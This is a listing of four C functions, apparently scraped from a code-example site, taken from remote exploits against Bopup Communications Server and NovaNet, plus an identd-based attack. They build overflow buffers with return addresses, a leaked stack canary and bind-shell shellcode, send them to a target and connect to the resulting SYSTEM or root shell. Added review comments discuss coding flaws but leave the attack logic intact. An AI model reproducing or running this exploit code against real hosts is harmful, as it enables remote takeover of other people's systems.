Пример #1
/*
 * Entry point of the Bopup Communications Server PoC listing.
 *
 * Flow: take <host> from argv, connect to it on PORT_BOPUP, send a buffer
 * filled by zbuffami(), close the socket, wait, then try PORT_SHELL and
 * hand an accepted connection to shellami().
 *
 * Everything this function leans on is defined outside the listing:
 * sockami(), zbuffami(), sock_send(), shellami(), BUF_SIZE, PORT_BOPUP,
 * PORT_SHELL, BOPUP_STR_OFFSET, BOPUP_STR_LEN and BOPUP_POPRET.
 *
 * Returns EXIT_SUCCESS (also on a usage error); calls exit(EXIT_FAILURE)
 * when the connect or the send fails.
 */
int
main (int argc, char **argv)
{
  /* NOTE(review): zbuffami() receives no length argument, so nothing here
     proves BUF_SIZE >= BOPUP_STR_OFFSET + BOPUP_STR_LEN -- the number of
     bytes later sent from zbuf.  Confirm against zbuffami()'s definition. */
  char zbuf[BUF_SIZE];
  int fd, n;

  printf ("Bopup Communications Server remote SYSTEM exploit\n"
          "by: <*****@*****.**>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");

  /* A missing host exits with EXIT_SUCCESS, so a calling script cannot
     tell "no host given" apart from a completed run. */
  if (argc <= 1)
    {
      fprintf (stderr, "Usage: %s <host>\n", argv[0]);
      exit (EXIT_SUCCESS);
    }

  /* sockami() is assumed to return -1 on failure; that is the only
     error convention checked here. */
  fd = sockami (argv[1], PORT_BOPUP);
  if (fd == -1)
    {
      fprintf (stderr, "%s: sockami failed\n", argv[0]);
      exit (EXIT_FAILURE);
    }

  printf ("* connected to %s:%d\n\n", argv[1], PORT_BOPUP);

  /* Echo the parameters derived from the BOPUP_* constants.  %08X expects
     an unsigned int; whether BOPUP_POPRET has that type is not visible
     in this listing. */
  printf ("** SEH offset @+%04X\n", BOPUP_STR_OFFSET + BOPUP_STR_LEN - 8);
  printf ("** return addy @0x%08X\n\n", BOPUP_POPRET);

  printf ("* building buffer with shellcode...");
  zbuffami (zbuf);
  printf ("done\n");

  /* sock_send() is expected to return the number of bytes written; a
     short write is treated as fatal rather than retried. */
  printf ("* sending request...");
  if ((n = sock_send (fd, zbuf, BOPUP_STR_OFFSET + BOPUP_STR_LEN)) != BOPUP_STR_OFFSET + BOPUP_STR_LEN)
    {
      fprintf (stderr, "%s: sock_send returned %d (!= %d)\n",
               argv[0], n, BOPUP_STR_OFFSET + BOPUP_STR_LEN);
      exit (EXIT_FAILURE);
    }
  printf ("done\n");
  close (fd);

  /* Fixed delay; there is no feedback from the server, so the wait is a
     guess rather than a synchronisation point. */
  printf ("* waiting for the shellcode to be executed...\n");
  sleep (2);

  /* A successful connect to PORT_SHELL is the only success signal.  No
     message is printed on failure, and the descriptor is not closed in
     this function (shellami() may do so -- not visible here). */
  if ((fd = sockami (argv[1], PORT_SHELL)) != -1)
    {
      printf ("+Wh00t!\n\n");
      shellami (fd);
    }

  return (EXIT_SUCCESS);
}
Пример #2
/*
 * Opens a connection to host from MY_PORT to THEIR_PORT (which, per the
 * banner, makes the target query the local fake identd), closes it, waits
 * one second, then connects to host:6969 from local port 30464 and hands
 * that socket to shellami().
 *
 * Depends on file-scope state that is not in this listing: host[] (the
 * whole function is a no-op when host[0] == 0), MY_PORT, THEIR_PORT,
 * sockami2() and shellami().  The argument order of sockami2() is only
 * inferred from the two calls below (host, local port, remote port).
 */
void
keep_clz(void)
{
  int	sock;

  if(host[0] != 0)
	{
	  printf("+Causing an auth request to our fake_identd\n");
	  /* NOTE(review): the return value is never checked; if sockami2()
	     reports failure the way sockami() does elsewhere (-1), that value
	     is passed straight to close() and, below, to shellami(). */
  	  sock = sockami2(host, MY_PORT, THEIR_PORT); 
  	  printf("  done\n");
  	  close(sock);

	  printf("+Enjoy your root shell...\n  0x69 =)\n");
	  /* Fixed one-second delay before the second connect; nothing
	     confirms the remote side is ready. */
	  sleep(1);
	  /* 6969 / 30464 are bare magic numbers; the rest of the file uses
	     named constants (MY_PORT, THEIR_PORT) for the same purpose. */
	  sock = sockami2(host, 6969, 30464);
	  shellami(sock);
	}
}
Пример #3
/*
 * Drives one session against the NovaNet TCP service on thost.
 *
 * Steps: read the value the banner below calls the stack canary via
 * novanet_read(), connect to NOVANET_TCP_PORT, patch d_name into
 * login_buf and send it, consume one reply packet, send rem_buf with a
 * length field patched in, then send an rlen-byte heap buffer whose
 * layout is fixed by the offsets below.  Afterwards close, wait, and try
 * PORT_SHELL, handing an accepted connection to shellami().
 *
 * Parameters:
 *   thost   - target host, passed through to novanet_read()/sockami().
 *   d_name  - copied into login_buf at offset 0x54, NOVANET_DOMAIN_SZ
 *             bytes, regardless of its real length (see note below).
 *   esp_val - mixed into CANARY_VAL(); the macro itself is not shown.
 *
 * Relies on file-scope definitions outside this listing: login_buf,
 * rem_buf, win32_x86_bind, NOVANET_* constants, NTDLL_ESP, USLEEP_TIME,
 * PORT_SHELL, CANARY_VAL(), HAS_NULL(), novanet_read(), sockami(),
 * sock_send(), sock_recv(), shellami().
 *
 * Every failure path calls exit(EXIT_FAILURE) rather than returning.
 */
static void
novanet_own_process (char *thost, char *d_name, int esp_val)
{
  char rbuf_pkt[NOVANET_PKT_SZ], *ptr;
  int canary_val, fd, n, rlen;

  /* novanet_read() is taken to return 0 on failure; the pointer argument
     is an integer literal cast to void *, the same address the banner
     below prints. */
  if (novanet_read (thost, (void *) 0x016A6784, &canary_val) == 0)
    {
      fprintf (stderr, "novanet_own_process: reading canary failed\n");
      exit (EXIT_FAILURE);
    }

  fd = sockami (thost, NOVANET_TCP_PORT);
  if (fd == -1)
    {
      fprintf (stderr, "novanet_own_process: sockami failed\n");
      exit (EXIT_FAILURE);
    }

  /* %08X expects unsigned int; the explicit (int) cast is the wrong
     direction for that conversion. */
  printf ("** [nnwindtb.dll @ 0x016A6784] stack canary: 0x%08X\n\n", (int) canary_val);
  /* Bails out after the socket is open; fd is not closed before exit()
     (the process terminates, so this is cosmetic). */
  if (HAS_NULL (CANARY_VAL(canary_val, esp_val)))
    {
      fprintf (stderr, "novanet_own_process: canary value invalid :(\n");
      exit (EXIT_FAILURE);
    }

  printf ("* connected to %s:%d\n", thost, NOVANET_TCP_PORT);

  /* NOTE(review): copies a fixed NOVANET_DOMAIN_SZ bytes from d_name with
     no length check, so a shorter d_name (e.g. a short argv string) is
     read past its terminator. */
  memcpy (&login_buf[0x54], d_name, NOVANET_DOMAIN_SZ);

  /* Sends sizeof login_buf - 1 bytes but expects NOVANET_PKT_SZ back;
     these agree only if login_buf is exactly NOVANET_PKT_SZ + 1 bytes
     (a NUL-terminated literal) -- not verifiable from this listing. */
  printf ("** sending login packet...");
  if ((n = sock_send (fd, login_buf, sizeof login_buf - 1)) != NOVANET_PKT_SZ)
    {
      fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
               n, NOVANET_PKT_SZ);
      exit (EXIT_FAILURE);
    }
  printf ("done\n");

  /* The reply is read only to consume it; rbuf_pkt is never inspected. */
  printf ("** reading fourth packet...");
  if ((n = sock_recv (fd, rbuf_pkt, sizeof rbuf_pkt)) != NOVANET_PKT_SZ)
    {
      fprintf (stderr, "novanet_own_process: sock_recv returned %d (!= %d)\n",
               n, NOVANET_PKT_SZ);
      exit (EXIT_FAILURE);
    }
  printf ("done\n");

  /* Total size of the final buffer: fixed prefix, 64-byte gap, the
     win32_x86_bind bytes (minus its NUL), plus one trailing NUL. */
  rlen = 0x10C + 64 + (sizeof win32_x86_bind - 1) + 1;
  /* Length field written through a type-punned pointer into a char array,
     in host byte order (no hton* call) -- portable only on targets that
     tolerate unaligned, aliasing stores; memcpy would be the clean form. */
  *(unsigned int *) &rem_buf[12] = rlen + NOVANET_HDR_SZ;

  /* Same sizeof-minus-one vs. named-constant assumption as for login_buf. */
  printf ("** sending remaining %d-bytes packet...", rlen);
  if ((n = sock_send (fd, rem_buf, sizeof rem_buf - 1)) != NOVANET_HDR_SZ)
    {
      fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
               n, NOVANET_HDR_SZ);
      exit (EXIT_FAILURE);
    }
  printf ("done\n");

  printf ("** sending hammer packet...");

  /* NOTE(review): malloc() result is not checked; a NULL return is passed
     straight to memset().  sizeof (char) is 1 by definition. */
  ptr = malloc (rlen * sizeof (char));
  memset (ptr, 0x41, rlen);
  /* Two 4-byte stores at 0x104 and 0x108, again via unsigned int casts
     into a char buffer (see the rem_buf note above). */
  *(unsigned int *) &ptr[0x104] = CANARY_VAL(canary_val, esp_val);
  *(unsigned int *) &ptr[0x108] = NTDLL_ESP;
  /* Copy ends exactly at rlen - 1, which the next line overwrites with NUL. */
  memcpy (&ptr[0x10C + 64], win32_x86_bind, sizeof win32_x86_bind - 1);
  ptr[rlen - 1] = '\0';

  /* Exits without free(ptr) on failure; harmless because the process ends. */
  if ((n = sock_send (fd, ptr, rlen)) != rlen)
    {
      fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
               n, rlen);
      exit (EXIT_FAILURE);
    }

  free (ptr);
  printf ("done\n\n");

  /* Delay before close so the peer can drain the buffer; USLEEP_TIME is
     defined elsewhere. */
  usleep (USLEEP_TIME);
  close (fd);

  /* Fixed delay; no feedback channel exists, so the wait is a guess. */
  printf ("* waiting for the shellcode to be executed...\n");
  sleep (2);
 
  /* A successful connect is the only success signal; failure is silent
     and the descriptor is not closed in this function. */
  if ((fd = sockami (thost, PORT_SHELL)) != -1)
    {
      printf ("+Wh00t!\n\n");
      shellami (fd);
    }
}
Пример #4
/*
 * Variant of novanet_own_process() without the canary read: connect to
 * the NovaNet TCP service on thost, patch d_name into login_buf and send
 * it, consume one reply packet, send rem_buf with a length field patched
 * in, then send an rlen-byte heap buffer laid out by the offsets below.
 * Afterwards close, wait, and try PORT_SHELL, handing an accepted
 * connection to shellami().
 *
 * Parameters:
 *   thost  - target host, passed through to sockami().
 *   d_name - copied into login_buf at offset 0x54, NOVANET_DOMAIN_SZ
 *            bytes, regardless of its real length (see note below).
 *
 * Relies on file-scope definitions outside this listing: login_buf,
 * rem_buf, lnx_x86_bind, NOVANET_* constants, NOVANET_POPRET, USLEEP_TIME,
 * PORT_SHELL, sockami(), sock_send(), sock_recv(), shellami().
 *
 * Every failure path calls exit(EXIT_FAILURE) rather than returning.
 */
static void
novanet_own_process (char *thost, char *d_name)
{
  char rbuf_pkt[NOVANET_PKT_SZ], *ptr;
  int fd, n, rlen;

  /* sockami() is assumed to return -1 on failure. */
  fd = sockami (thost, NOVANET_TCP_PORT);
  if (fd == -1)
    {
      fprintf (stderr, "novanet_own_process: sockami failed\n");
      exit (EXIT_FAILURE);
    }

  printf ("* connected to %s:%d\n", thost, NOVANET_TCP_PORT);

  /* NOTE(review): copies a fixed NOVANET_DOMAIN_SZ bytes from d_name with
     no length check, so a shorter d_name (e.g. a short argv string) is
     read past its terminator. */
  memcpy (&login_buf[0x54], d_name, NOVANET_DOMAIN_SZ);

  /* Sends sizeof login_buf - 1 bytes but expects NOVANET_PKT_SZ back;
     these agree only if login_buf is exactly NOVANET_PKT_SZ + 1 bytes
     (a NUL-terminated literal) -- not verifiable from this listing. */
  printf ("** sending login packet...");
  if ((n = sock_send (fd, login_buf, sizeof login_buf - 1)) != NOVANET_PKT_SZ)
    {
      fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
               n, NOVANET_PKT_SZ);
      exit (EXIT_FAILURE);
    }
  printf ("done\n");

  /* The reply is read only to consume it; rbuf_pkt is never inspected. */
  printf ("** reading fourth packet...");
  if ((n = sock_recv (fd, rbuf_pkt, sizeof rbuf_pkt)) != NOVANET_PKT_SZ)
    {
      fprintf (stderr, "novanet_own_process: sock_recv returned %d (!= %d)\n",
               n, NOVANET_PKT_SZ);
      exit (EXIT_FAILURE);
    }
  printf ("done\n");

  /* Final buffer: 0x138 bytes plus one trailing NUL.  Unlike the Windows
     variant, the size does not depend on sizeof lnx_x86_bind, so the
     memcpy below only fits if that array is at most 0x139 bytes -- not
     verifiable here. */
  rlen = 0x138 + 1;
  /* Length field written through a type-punned pointer into a char array,
     in host byte order (no hton* call) -- portable only on targets that
     tolerate unaligned, aliasing stores; memcpy would be the clean form. */
  *(unsigned int *) &rem_buf[12] = rlen + NOVANET_HDR_SZ;

  /* Same sizeof-minus-one vs. named-constant assumption as for login_buf. */
  printf ("** sending remaining %d-bytes packet...", rlen);
  if ((n = sock_send (fd, rem_buf, sizeof rem_buf - 1)) != NOVANET_HDR_SZ)
    {
      fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
               n, NOVANET_HDR_SZ);
      exit (EXIT_FAILURE);
    }
  printf ("done\n");

  printf ("** sending hammer packet...");

  /* NOTE(review): malloc() result is not checked; a NULL return is passed
     straight to memset().  sizeof (char) is 1 by definition. */
  ptr = malloc (rlen * sizeof (char));
  memset (ptr, 0x41, rlen);
  /* 4-byte store at 0x134..0x137, the last bytes before the trailing NUL,
     via an unsigned int cast into a char buffer (see the rem_buf note). */
  *(unsigned int *) &ptr[0x134] = NOVANET_POPRET;
  /* Copied from offset 0 and may overlap the store above if lnx_x86_bind
     is longer than 0x134 bytes; order of the two writes then matters. */
  memcpy (&ptr[0], lnx_x86_bind, sizeof lnx_x86_bind - 1);
  ptr[rlen - 1] = '\0';

  /* Exits without free(ptr) on failure; harmless because the process ends. */
  if ((n = sock_send (fd, ptr, rlen)) != rlen)
    {
      fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
               n, rlen);
      exit (EXIT_FAILURE);
    }

  free (ptr);
  printf ("done\n\n");

  /* Delay before close so the peer can drain the buffer; USLEEP_TIME is
     defined elsewhere. */
  usleep (USLEEP_TIME);
  close (fd);

  /* Fixed delay; no feedback channel exists, so the wait is a guess. */
  printf ("* waiting for the shellcode to be executed...\n");
  sleep (2);
 
  /* A successful connect is the only success signal; failure is silent
     and the descriptor is not closed in this function. */
  if ((fd = sockami (thost, PORT_SHELL)) != -1)
    {
      printf ("+Wh00t!\n\n");
      shellami (fd);
    }
}